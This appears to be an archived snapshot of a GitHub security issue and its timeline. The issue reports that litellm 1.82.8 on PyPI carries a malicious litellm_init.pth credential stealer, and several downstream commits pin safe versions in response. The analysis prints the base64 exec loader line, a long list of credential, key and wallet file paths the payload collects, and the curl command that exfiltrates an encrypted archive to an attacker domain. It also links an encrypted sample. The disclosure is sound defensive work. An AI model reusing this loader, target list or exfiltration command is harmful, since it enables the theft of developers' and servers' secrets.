(Mar 24, 2026, 3:29 PM UTC) on Mar 24, 2026  (security: pin LiteLLM image to v1.82.3 \u2014 supply chain compromise\n\nLiteLLM PyPI packages 1.82.7 and 1.82.8 contain a malicious .pth file\n(litellm_init.pth) that exfiltrates environment variables, SSH keys,\ncloud credentials, and Kubernetes configs to an external endpoint.\n\nSee: https://github.com/BerriAI/litellm/issues/24512\n\nOur template used the floating tag `main-stable` which could pull a\ncompromised build. Pin to `main-v1.82.3` (confirmed safe, matches\nthe version currently running in our clusters).\n\nNever use floating tags for security-sensitive dependencies.) (https://github.com/ObolNetwork/obol-stack/commit/8ce09d75bac368433acff51720aa8a9faf7d5f41) security: pin LiteLLM image to v1.82.3 \u2014 supply chain compromise    ...    (https://github.com/ObolNetwork/obol-stack/commit/8ce09d75bac368433acff51720aa8a9faf7d5f41) 8ce09d7                  (/bussyjd) () bussyjd   mentioned this (https://github.com/BerriAI/litellm/issues/24512#event-5247548613) (Mar 24, 2026, 3:29 PM UTC) on Mar 24, 2026       (https://github.com/ObolNetwork/obol-stack/pull/289) security: pin LiteLLM to v1.82.3 (supply chain compromise) ObolNetwork/obol-stack#289              (https://github.com/lib0xidium) (lib0xidium)     lib0xidium commented (Mar 24, 2026, 3:30 PM UTC) on Mar 24, 2026   (/lib0xidium) (@lib0xidium)   (/lib0xidium) lib0xidium  (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4119206887) (Mar 24, 2026, 3:30 PM UTC) on Mar 24, 2026          More actions      The archive as provided by PyPi: (https://files.pythonhosted.org/packages/f6/2c/731b614e6cee0bca1e010a36fd381fba69ee836fe3cb6753ba23ef2b9601/litellm-1.82.8.tar.gz) https://files.pythonhosted.org/packages/f6/2c/731b614e6cee0bca1e010a36fd381fba69ee836fe3cb6753ba23ef2b9601/litellm-1.82.8.tar.gz  For future ref (AES secret: malicious)(https://github.com/user-attachments/files/26218972/litellm-1.82.8.enc.tar.gz) litellm-1.82.8.enc.tar.gz           (https://github.com/bangbangsheshotmedown) (bangbangsheshotmedown)     bangbangsheshotmedown commented (Mar 24, 2026, 3:30 PM UTC) on Mar 24, 2026   (/bangbangsheshotmedown) (@bangbangsheshotmedown)   (/bangbangsheshotmedown) bangbangsheshotmedown  (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4119207656) (Mar 24, 2026, 3:30 PM UTC) on Mar 24, 2026          More actions      cargo cults deserve what they get                 (/humanagent) () humanagent   added a commit that references this issue (https://github.com/BerriAI/litellm/issues/24512#event-23857191641) (Mar 24, 2026, 3:30 PM UTC) on Mar 24, 2026  (fix(hermes): pin litellm==1.82.6 to block compromised versions\n\nlitellm 1.82.7\u20131.82.8 contained a credential-stealing payload\n(supply chain attack by TeamPCP). Pin to last known-clean version\nas a safeguard against transitive installs.\n\nRef: https://github.com/BerriAI/litellm/issues/24512\n\nCo-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>) (https://github.com/xmtplabs/convos-assistants/commit/fbfd7c2a019bfe64452659b130fe6f64b9fc04c3) fix(hermes): pin litellm==1.82.6 to block compromised versions    ...    (https://github.com/xmtplabs/convos-assistants/commit/fbfd7c2a019bfe64452659b130fe6f64b9fc04c3) fbfd7c2                  (/humanagent) () humanagent   mentioned this (https://github.com/BerriAI/litellm/issues/24512#event-5247562271) (Mar 24, 2026, 3:30 PM UTC) on Mar 24, 2026       (https://github.com/xmtplabs/convos-assistants/pull/695) fix(hermes): pin litellm==1.82.6 to block compromised versions xmtplabs/convos-assistants#695                 (/saurya) () saurya   added a commit that references this issue (https://github.com/BerriAI/litellm/issues/24512#event-23857218813) (Mar 24, 2026, 3:31 PM UTC) on Mar 24, 2026  (security: pin litellm<=1.82.6 to mitigate supply chain attack\n\nLiteLLM versions 1.82.7 and 1.82.8 on PyPI contain a malicious\n.pth file (litellm_init.pth) that executes a credential-stealing\npayload on Python interpreter startup. The payload collects and\nexfiltrates SSH keys, cloud credentials, API keys, and other\nsensitive data.\n\nThis pins litellm to <=1.82.6 until safe versions are released.\n\nReference: https://github.com/BerriAI/litellm/issues/24512) (https://github.com/OpenHands/OpenHands/commit/09c3fc7afed9eb95cadf5c68f1dfc3313dc1526c) security: pin litellm<=1.82.6 to mitigate supply chain attack    ...    (https://github.com/OpenHands/OpenHands/commit/09c3fc7afed9eb95cadf5c68f1dfc3313dc1526c) 09c3fc7                  (/saurya) () saurya   mentioned this (https://github.com/BerriAI/litellm/issues/24512#event-5247574621) (Mar 24, 2026, 3:31 PM UTC) on Mar 24, 2026       (https://github.com/OpenHands/OpenHands/pull/13569) security: pin litellm<=1.82.6 to mitigate supply chain attack OpenHands/OpenHands#13569                 (/bussyjd) () bussyjd   added a commit that references this issue (https://github.com/BerriAI/litellm/issues/24512#event-23857274227) (Mar 24, 2026, 3:32 PM UTC) on Mar 24, 2026  (security: pin LiteLLM image to v1.82.3 \u2014 supply chain compromise\n\nLiteLLM PyPI packages 1.82.7 and 1.82.8 contain a malicious .pth file\n(litellm_init.pth) that exfiltrates environment variables, SSH keys,\ncloud credentials, and Kubernetes configs to an external endpoint.\n\nSee: https://github.com/BerriAI/litellm/issues/24512\n\nOur template used the floating tag `main-stable` which could pull a\ncompromised build. Pin to `main-v1.82.3` (confirmed safe, matches\nthe version currently running in our clusters).\n\nNever use floating tags for security-sensitive dependencies.) (https://github.com/ObolNetwork/obol-stack/commit/d81316f6a906bf51573afdd3f29fa9612d267813) security: pin LiteLLM image to v1.82.3 \u2014 supply chain compromise    ...    (https://github.com/ObolNetwork/obol-stack/commit/d81316f6a906bf51573afdd3f29fa9612d267813) d81316f                  (/sanket-mendapara) () sanket-mendapara   added a commit that references this issue (https://github.com/BerriAI/litellm/issues/24512#event-23857275220) (Mar 24, 2026, 3:32 PM UTC) on Mar 24, 2026  (security: pin litellm to vetted wheel (#138)\n\n* security: pin litellm to vetted wheel (PyPI index + supply chain)\n\n- Use files.pythonhosted.org wheel for litellm 1.80.10; PyPI simple index\n  may omit litellm; avoids pulling compromised releases (BerriAI/litellm#24512).\n- Regenerate uv.lock.\n\n* security: use litellm==1.80.16 (semver) instead of direct wheel URL\n\n- Drop URL pin; keep lockfile hashes for reproducible installs.\n- Regenerate uv.lock (litellm 1.80.16).\n\n* fix: uv.lock \u2014 litellm from PyPI registry (remove local find-links path)) (https://github.com/cisco-ai-defense/mcp-scanner/commit/bacb20734ba169e44c197131802232f93da1a121) security: pin litellm to vetted wheel ((https://github.com/cisco-ai-defense/mcp-scanner/pull/138) #138 )    ...    Verified (https://github.com/cisco-ai-defense/mcp-scanner/commit/bacb20734ba169e44c197131802232f93da1a121) bacb207                 (/signup?return_to=https://github.com/BerriAI/litellm/issues/24512) Sign up for free   to join this conversation on GitHub. Already have an account?  (/login?return_to=https://github.com/BerriAI/litellm/issues/24512) Sign in to comment     Metadata Metadata  Assignees  No one assigned     Labels   (https://github.com/BerriAI/litellm/issues?q=state%3Aopen%20label%3A%22llm%20translation%22) llm translation         Type  No type      Projects  No projects     Milestone  No milestone       Relationships  None yet     Development       Code with agent mode        Select code repository     No branches or pull requests     Participants   (/mj6uc) (@mj6uc)  (/olivierverdier) (@olivierverdier)  (/christopherwoodall) (@christopherwoodall)  (/jerieljan) (@jerieljan)  (/bo7) (@bo7)   +155      Issue actions                     Footer (https://github.com)    \u00a9 2026 GitHub,\u00a0Inc.   Footer navigation (https://docs.github.com/site-policy/github-terms/github-terms-of-service) Terms  (https://docs.github.com/site-policy/privacy-policies/github-privacy-statement) Privacy  (https://github.com/security) Security  (https://www.githubstatus.com/) Status  (https://github.community/) Community  (https://docs.github.com/) Docs  (https://support.github.com?tags=dotcom-footer) Contact  Manage cookies    Do not share my personal information              You can\u2019t perform that action at this time.          "
                ],
                "output": "htmltotext.txt",
                "pwd": "/data/archive/1774366479.218801",
                "schema": "ArchiveResult",
                "start_ts": "2026-03-24T15:35:41.053030+00:00",
                "status": "succeeded"
            }
        ],
        "media": [
            {
                "cmd": [
                    "/usr/local/bin/yt-dlp",
                    "--restrict-filenames",
                    "--trim-filenames",
                    "128",
                    "--write-description",
                    "--write-info-json",
                    "--write-annotations",
                    "--write-thumbnail",
                    "--no-call-home",
                    "--write-sub",
                    "--write-auto-subs",
                    "--convert-subs=srt",
                    "--yes-playlist",
                    "--continue",
                    "--no-abort-on-error",
                    "--ignore-errors",
                    "--geo-bypass",
                    "--add-metadata",
                    "--format=(bv*+ba/b)[filesize<=750m][filesize_approx<=?750m]/(bv*+ba/b)",
                    "--skip-download",
                    "--cache-dir=/data/yt-dlp-cache/",
                    "--cookies=/data/yt-dlp-cache/cookies.txt",
                    "--proxy=socks5://tor-socks-proxy:9150",
                    "--no-playlist",
                    "https://github.com/BerriAI/litellm/issues/24512"
                ],
                "cmd_version": "2024.10.7",
                "end_ts": "2026-03-24T15:35:49.960156+00:00",
                "index_texts": [],
                "output": "media/",
                "pwd": "/data/archive/1774366479.218801",
                "schema": "ArchiveResult",
                "start_ts": "2026-03-24T15:35:43.325307+00:00",
                "status": "succeeded"
            }
        ],
        "mercury": [
            {
                "cmd": [
                    "/home/archivebox/.npm/bin/postlight-parser",
                    "https://github.com/BerriAI/litellm/issues/24512"
                ],
                "cmd_version": "2.2.3",
                "end_ts": "2026-03-24T15:35:40.924321+00:00",
                "index_texts": null,
                "output": "mercury/",
                "pwd": "/data/archive/1774366479.218801",
                "schema": "ArchiveResult",
                "start_ts": "2026-03-24T15:35:37.408116+00:00",
                "status": "succeeded"
            }
        ],
        "pdf": [],
        "readability": [
            {
                "cmd": [
                    "/home/archivebox/.npm/bin/readability-extractor",
                    "/tmp/tmpn7yse6hl",
                    "https://github.com/BerriAI/litellm/issues/24512"
                ],
                "cmd_version": "0.0.11",
                "end_ts": "2026-03-24T15:35:27.819487+00:00",
                "index_texts": [
                    "[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 PyPI package \u2014 credential stealer\nSummary\nThe litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts \u2014 no import litellm required.\nThis is a supply chain compromise. The malicious file is listed in the package's own RECORD:\nlitellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628\n\nReproduction\npip download litellm==1.82.8 --no-deps -d /tmp/check\npython3 -c \"\nimport zipfile, os\nwhl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]\nwith zipfile.ZipFile(whl) as z:\n    pth = [n for n in z.namelist() if n.endswith('.pth')]\n    print('PTH files:', pth)\n    for p in pth:\n        print(z.read(p)[:300])\n\"\nYou will see litellm_init.pth containing:\nimport os, subprocess, sys; subprocess.Popen([sys.executable, \"-c\", \"import base64; exec(base64.b64decode('...'))\"])\nMalicious Behavior (full analysis)\nThe payload is double base64-encoded. When decoded, it performs the following:\nStage 1: Information Collection\nThe script collects sensitive data from the host system:\n\nSystem info: hostname, whoami, uname -a, ip addr, ip route\nEnvironment variables: printenv (captures all API keys, secrets, tokens)\nSSH keys: ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.ssh/id_ecdsa, ~/.ssh/id_dsa, ~/.ssh/authorized_keys, ~/.ssh/known_hosts, ~/.ssh/config\nGit credentials: ~/.gitconfig, ~/.git-credentials\nAWS credentials: ~/.aws/credentials, ~/.aws/config, IMDS token + security credentials\nKubernetes secrets: ~/.kube/config, /etc/kubernetes/admin.conf, /etc/kubernetes/kubelet.conf, /etc/kubernetes/controller-manager.conf, /etc/kubernetes/scheduler.conf, service account tokens\nGCP credentials: ~/.config/gcloud/application_default_credentials.json\nAzure credentials: ~/.azure/\nDocker configs: ~/.docker/config.json, /kaniko/.docker/config.json, /root/.docker/config.json\nPackage manager configs: ~/.npmrc, ~/.vault-token, ~/.netrc, ~/.lftprc, ~/.msmtprc, ~/.my.cnf, ~/.pgpass, ~/.mongorc.js\nShell history: ~/.bash_history, ~/.zsh_history, ~/.sh_history, ~/.mysql_history, ~/.psql_history, ~/.rediscli_history\nCrypto wallets: ~/.bitcoin/, ~/.litecoin/, ~/.dogecoin/, ~/.zcash/, ~/.dashcore/, ~/.ripple/, ~/.bitmonero/, ~/.ethereum/keystore/, ~/.cardano/, ~/.config/solana/\nSSL/TLS private keys: /etc/ssl/private/, Let's Encrypt .pem and .key files\nCI/CD secrets: terraform.tfvars, .gitlab-ci.yml, .travis.yml, Jenkinsfile, .drone.yml, Anchor.toml, ansible.cfg\nDatabase credentials: PostgreSQL, MySQL, Redis, LDAP config files\nWebhook URLs: grep for Slack/Discord webhook URLs in env and config files\n\nStage 2: Encryption & Exfiltration\n\nCollected data is written to a temporary file\nA random 32-byte AES-256 session key is generated via openssl rand\nThe collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2\nThe AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep\nBoth encrypted files are packed into tpcp.tar.gz\nThe archive is exfiltrated via:\n\ncurl -s -o /dev/null -X POST \\\n  \"https://models.litellm.cloud/\" \\\n  -H \"Content-Type: application/octet-stream\" \\\n  -H \"X-Filename: tpcp.tar.gz\" \\\n  --data-binary @tpcp.tar.gz\nKey Technical Details\n\nTrigger mechanism: .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see Python docs on .pth files). No import statement is needed.\nStealth: The payload is double base64-encoded, making it invisible to naive source code grep.\nExfiltration target: https://models.litellm.cloud/ \u2014 note the domain litellm.cloud (NOT litellm.ai, the official domain).\nRSA public key (first 64 chars): MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+...\n\nImpact\nAnyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.\nThis affects:\n\nLocal development machines\nCI/CD pipelines\nDocker containers\nProduction servers\n\nAffected Version\n\nConfirmed: litellm==1.82.8 (PyPI wheel litellm-1.82.8-py3-none-any.whl)\nOther versions: Not yet checked \u2014 the attacker may have compromised multiple releases\n\nRecommended Actions\n\nPyPI: Yank/remove litellm 1.82.8 immediately\nUsers: Check for litellm_init.pth in your site-packages/ directory\nUsers: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed\nBerriAI: Audit PyPI publishing credentials and CI/CD pipeline for compromise\n\nEnvironment\n\nOS: Ubuntu 24.04 (Docker container)\nPython: 3.13\npip installed from PyPI\nDiscovered: 2026-03-24"
                ],
                "output": "readability/",
                "pwd": "/data/archive/1774366479.218801",
                "schema": "ArchiveResult",
                "start_ts": "2026-03-24T15:35:21.435727+00:00",
                "status": "succeeded"
            }
        ],
        "screenshot": [],
        "singlefile": [],
        "title": [
            {
                "cmd": [
                    "/usr/bin/curl",
                    "--silent",
                    "--location",
                    "--compressed",
                    "--proxy",
                    "socks5://tor-socks-proxy:9150",
                    "--max-time",
                    "60",
                    "--user-agent",
                    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 ArchiveBox/{VERSION} (+https://github.com/ArchiveBox/ArchiveBox/)",
                    "https://github.com/BerriAI/litellm/issues/24512"
                ],
                "cmd_version": "8.10.1",
                "end_ts": "2026-03-24T15:35:20.449604+00:00",
                "index_texts": null,
                "output": "[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 \u2014 credential stealer \u00b7 Issue #24512 \u00b7 BerriAI/litellm",
                "pwd": "/data/archive/1774366479.218801",
                "schema": "ArchiveResult",
                "start_ts": "2026-03-24T15:35:20.255078+00:00",
                "status": "succeeded"
            }
        ],
        "wget": []
    },
    "icons": null,
    "is_archived": true,
    "is_static": false,
    "latest": {
        "archive_org": "ArchiveError: Failed to find \"content-location\" URL header in Archive.org response.",
        "dom": "output.html",
        "favicon": "favicon.ico",
        "git": null,
        "media": "media/",
        "pdf": null,
        "screenshot": null,
        "singlefile": null,
        "title": "[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 \u2014 credential stealer \u00b7 Issue #24512 \u00b7 BerriAI/litellm",
        "warc": null,
        "wget": null
    },
    "link_dir": "/data/archive/1774366479.218801",
    "newest_archive_date": "2026-03-24T15:35:50.016251+00:00",
    "num_failures": 1,
    "num_outputs": 8,
    "oldest_archive_date": "2026-03-24T15:34:46.566451+00:00",
    "path": "/BerriAI/litellm/issues/24512",
    "schema": "Link",
    "scheme": "https",
    "snapshot_abid": "snp_01KMG7QMXZ1039DB3201DVARBM",
    "snapshot_id": "917b3d3c-a2bf-465d-9f01-0c50dbb56174",
    "sources": [
        "/data/sources/1774366476-import.txt"
    ],
    "tags": null,
    "tags_str": "",
    "timestamp": "1774366479.218801",
    "title": "[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 \u2014 credential stealer \u00b7 Issue #24512 \u00b7 BerriAI/litellm",
    "url": "https://github.com/BerriAI/litellm/issues/24512"
}